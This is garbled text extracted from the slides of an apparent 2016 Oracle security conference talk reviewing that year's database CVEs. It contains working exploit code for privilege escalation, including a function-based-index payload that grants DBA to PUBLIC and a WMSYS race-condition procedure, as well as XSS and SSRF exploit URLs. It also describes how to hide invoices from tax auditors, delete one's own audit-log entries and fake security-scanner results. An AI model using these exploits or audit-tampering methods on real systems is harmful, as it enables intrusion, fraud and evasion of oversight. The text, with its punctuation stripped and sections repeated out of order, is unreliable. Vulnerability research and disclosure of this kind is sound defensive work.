BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
